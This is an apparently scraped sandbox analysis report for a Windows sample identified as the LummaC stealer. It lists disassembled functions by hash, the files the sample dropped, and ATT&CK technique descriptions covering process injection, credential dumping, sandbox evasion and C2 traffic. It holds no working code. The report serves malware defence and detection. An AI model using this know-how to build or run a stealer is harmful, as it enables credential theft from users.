Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0c57005a62a507d8e6fb65c4beee5771d2f724920adbcece6ab24b0124d563a
Instruction ID: a15b227afacf316e019d539d0ac91421acc1051c8401e8426e897f14c4fe0d2e
Opcode Fuzzy Hash: b0c57005a62a507d8e6fb65c4beee5771d2f724920adbcece6ab24b0124d563a
Instruction Fuzzy Hash: B5A126B2B04B804BD3198A38D89136BBFE2ABD5308F5CC97DC5DB87346E639A445C746

Function 0043AA00 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af9c4643f8ce71516d6888dae12218d0540f0aa019acd8ff8abfd066ecbe9a3
Instruction ID: 7bc57cb332118c4f52d6302f8f4d4b66f4e26c6ff24aa2ce5191b2fd42b511dc
Opcode Fuzzy Hash: 9af9c4643f8ce71516d6888dae12218d0540f0aa019acd8ff8abfd066ecbe9a3
Instruction Fuzzy Hash: BF71383A749652CFC7009F3CE8E025AB3A1EBCB315F0E86B9C5C597756C2389856DB81

Function 004201F3 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78249001226d337e5d93963206479f381cfebe06fcb11470e1e29fddac355ce
Instruction ID: 339020c2bdd1b364ff79022d7c26bfc0b3113fa0c89456fe7f49b6c47cf04311
Opcode Fuzzy Hash: a78249001226d337e5d93963206479f381cfebe06fcb11470e1e29fddac355ce
Instruction Fuzzy Hash: 31612431B14721CBDB20CF68C4812ABB7F1EB1A350F58496EC88697382D37CAD05D7A9

Function 0042DBB0 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5587628e9af5e75d2a7c58451ddbce61554dce936d5bae19e299c636e88e16e3
Instruction ID: 669d7e76c4e98e4c7e3dd9e75b154535615c1ed6e9a49740d154c06d084f4795
Opcode Fuzzy Hash: 5587628e9af5e75d2a7c58451ddbce61554dce936d5bae19e299c636e88e16e3
Instruction Fuzzy Hash: 45515D33F1A9B147C7288D3D6C112AA6A575F96330B6D837BE9B1DB3D1C55C8C028399

Function 004231A8 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de64cd69f6bd35c4ea8dd8e0f1d3215bd08a222fe6a2d873d8bf2dd623ebd179
Instruction ID: e6ee1f9f07d51974ce93db15d9acf5212c336a13d1ae42cc0d814cbdbf8f79a7
Opcode Fuzzy Hash: de64cd69f6bd35c4ea8dd8e0f1d3215bd08a222fe6a2d873d8bf2dd623ebd179
Instruction Fuzzy Hash: 65511A72A14B254BD719CE2CEC5023BB2D2ABC8301F99863DDC568B385EA38ED11C795

Function 00431BE0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd829b1daef261b38cda2e39112b668b35dda2c8737084d4024bd853b18e7540
Instruction ID: 358e3286763561c34ee85bd466bda537ed0ed0323b6f4af8cd5f41f91906db73
Opcode Fuzzy Hash: cd829b1daef261b38cda2e39112b668b35dda2c8737084d4024bd853b18e7540
Instruction Fuzzy Hash: 47515BB15087548FE314DF29D89435BBBE1BBC9318F044A2EE4E987350E379DA088B86

Function 0043BDD0 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ebab458e156e836acb7530aa1ed8d2b5e11f38eeaa05b60e2a345b2a9165fa5
Instruction ID: 46d8ff1a4caefaebe2e94c248744a64f71dd77e6a362d910dcb9a2d39bbeb24d
Opcode Fuzzy Hash: 2ebab458e156e836acb7530aa1ed8d2b5e11f38eeaa05b60e2a345b2a9165fa5
Instruction Fuzzy Hash: C24157357083005BD3249A68CC82B7BB79BEBD9318F29952EE6C587391D77598014789

Function 0043B330 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466610d1eed7db160478b47a3cb0bd2e37029faf10b9824fd19cd14644ba36ff
Instruction ID: c92a34a86bb23cb5d125700b1c76bfd8bf7bd874eebd3ab69d0d39d9b75e20ec
Opcode Fuzzy Hash: 466610d1eed7db160478b47a3cb0bd2e37029faf10b9824fd19cd14644ba36ff
Instruction Fuzzy Hash: 5051DF36A05269CFDB04CF78D8903AE77F1FB4A300F094079D946EB251D379AA15CBA4

Function 0043AB50 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68e485f68c9a5901a1d63f30458296e007b08a27a069cb57174dba07fabda5a7
Instruction ID: ea80b83c3c03882aa2ed7120e8da97de1dc121c3fa98104ded61def1e9a650b3
Opcode Fuzzy Hash: 68e485f68c9a5901a1d63f30458296e007b08a27a069cb57174dba07fabda5a7
Instruction Fuzzy Hash: 3041E539748662CFC7408F2CE8E0546B3E6EBCF315F0A4674C685A7756C234AC55CB80

Function 00426A19 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8390be52d0fc80bac26f8f43f7d91224d4491d22c6b2e7ddedb638a9d9b642ae
Instruction ID: e016bd3a5b2e30d282accfad9c880c95c39ab5ad24bba6b7600d4b264f96c972
Opcode Fuzzy Hash: 8390be52d0fc80bac26f8f43f7d91224d4491d22c6b2e7ddedb638a9d9b642ae
Instruction Fuzzy Hash: A74127B0105BD28AC7258F3591607B3BFE49F63304F58889DC2EB67243D7396106CB58

Function 00426865 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cf31bbda53bdaf63d7af19f29f28f774909cbd0cf8395fb49311f8268d483d
Instruction ID: 45f8e07445f81c610541eba171ca969233a893be6d096ae6489b9d199596f542
Opcode Fuzzy Hash: d0cf31bbda53bdaf63d7af19f29f28f774909cbd0cf8395fb49311f8268d483d
Instruction Fuzzy Hash: 2031E3B0105BE28AC7258F3491617B3BFE59F53304F48889EC2EB67283D7396106CB59

Function 00422171 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2768b30e028b1f09c40714066531c68bd8a443b8113f52f00cae81a3e8f141b5
Instruction ID: 10f46fcecd15c47a886bc62fa57e6baf36dbd2037378e37e1b19e26551acf6e9
Opcode Fuzzy Hash: 2768b30e028b1f09c40714066531c68bd8a443b8113f52f00cae81a3e8f141b5
Instruction Fuzzy Hash: 3E31BDBA8093508FD310CFA6D84465BFBA3EFC6704F04994DE9966B319C7B5C905CB86

Function 004027C0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4167519310f43b3517b213ad5fb496a771803268dbf47e8cecfc648a47e6285a
Instruction ID: c126d631f09cd9a9f574247df608c4ff22f764634754ddfab9fe6016828a3348
Opcode Fuzzy Hash: 4167519310f43b3517b213ad5fb496a771803268dbf47e8cecfc648a47e6285a
Instruction Fuzzy Hash: 3011273BF2522207E354EE76ECD86176352EBC531070A0136EE41E33C2C6B6F801D1A4

Function 00413798 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41166b6f7e4f0e05e6637b10997c543a5bbec94ddb0782cb59f92e31f1ba3cdf
Instruction ID: 9152cc26c3f6965d2423ed264715f0ca4ee81f3d25f86ab02babf4cdb26f47c0
Opcode Fuzzy Hash: 41166b6f7e4f0e05e6637b10997c543a5bbec94ddb0782cb59f92e31f1ba3cdf
Instruction Fuzzy Hash: 6611C8B1A002008BCB24DF18C8929AB73F5FF45361B06916DE866DB3D1EB38E944C794

Function 00423F24 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e33286f5dda0f2785d98215aed794458f555d3ca741a238b4e1c24f806b510c0
Instruction ID: 763a477f0a46276adcb0ec8841214ea2f6aafdb30db98bfe477e0e598379f318
Opcode Fuzzy Hash: e33286f5dda0f2785d98215aed794458f555d3ca741a238b4e1c24f806b510c0
Instruction Fuzzy Hash: 93110060608322CAC700CF28E656667B7F0EF92749F45991EE0C18B764E37CCE49DB5A

Function 004253E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af8d4b0c1c5655787436963218c044d1f21c6127c72fe571752f21a726d64fd9
Instruction ID: dc0a91e69fd6af6c6bcb1056933c6325e335b4ce730711c0c389118c5b6c55af
Opcode Fuzzy Hash: af8d4b0c1c5655787436963218c044d1f21c6127c72fe571752f21a726d64fd9
Instruction Fuzzy Hash: 1F019EB1700F1147D620AE15A4C173BE3A86F90749F88443EE84957342DBB9EC45C6AD

Function 0040AAEB Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ef14fac7b45e2bde46186b6366a509dac21dc40c7f4894ad4f0bbbe8c4281f8
Instruction ID: 2ae84854db65c28fae6640ac9f5b5c968dd38e1ad358c9e3a3dc72d8ae56af60
Opcode Fuzzy Hash: 6ef14fac7b45e2bde46186b6366a509dac21dc40c7f4894ad4f0bbbe8c4281f8
Instruction Fuzzy Hash: 19E0C233B008154BC70CDD2CCC526B9B3AB5B97210B49D23A9111CB3D6EE38E5168200

Function 0040BD04 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abaceaab0d131e91e1958e04262fd8535b536775f6d8333e1c0963cfef7c2bd6
Instruction ID: 7f520365bb2ada4633075929b2cd1fe49d27b29bbce5b1f8259ad3979495c9f3
Opcode Fuzzy Hash: abaceaab0d131e91e1958e04262fd8535b536775f6d8333e1c0963cfef7c2bd6
Instruction Fuzzy Hash: 23D0122991A1888BC3258F389C95631F7719B07100F0420BAC542D7292D7B1A416861C

Function 00420470 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b85a8fcc0897e52df4e1f0fb9845ec98bb92747b8879fe0b53d59439962be42
Instruction ID: 64f76c2cc344cdca885dfe3ab8b2c93edc8f0f41a084e4e9fc29601e48989ebb
Opcode Fuzzy Hash: 1b85a8fcc0897e52df4e1f0fb9845ec98bb92747b8879fe0b53d59439962be42
Instruction Fuzzy Hash: 8BB012B5E4D510C6E1005E10BD02BB0B374A327308F55343EE10DB3243D5DDD581514F

Function 0042E4CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0042E505
GetSystemMetrics.USER32 ref: 0042E514

Strings

, xrefs: 0042E5BF

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 4b5f0c39f36169d3eb55ba92d9e7a3e60d2817e46aecbd399fccdb499751a225
Instruction ID: 4bce59276320d5236dab9db9eb4d8fc87b27fcdf99e3867c5ae6ea77b9a5c8f4
Opcode Fuzzy Hash: 4b5f0c39f36169d3eb55ba92d9e7a3e60d2817e46aecbd399fccdb499751a225
Instruction Fuzzy Hash: E63190B09193018FDB00EF69E98564DBBF4BF88304F11892DE498DB3A0D774A949CB86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nlJ2sNaZVi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nlJ2sNaZVi.exe.log

C:\Users\user\AppData\Local\Temp\RESBEB5.tmp

C:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP

C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.0.cs

C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline

C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll

C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.out

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
nlJ2sNaZVi.exe

Function 02D7280C Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Function 02D72818 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 02D72588 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Function 02D72590 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 02D723F0 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Function 02D72679 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 02D72680 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 02D723F8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 02D724C9 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Function 02D724D0 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Function 02D72340 Relevance: 1.6, APIs: 1, Instructions: 53
threadCOMMON

Function 02D72348 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre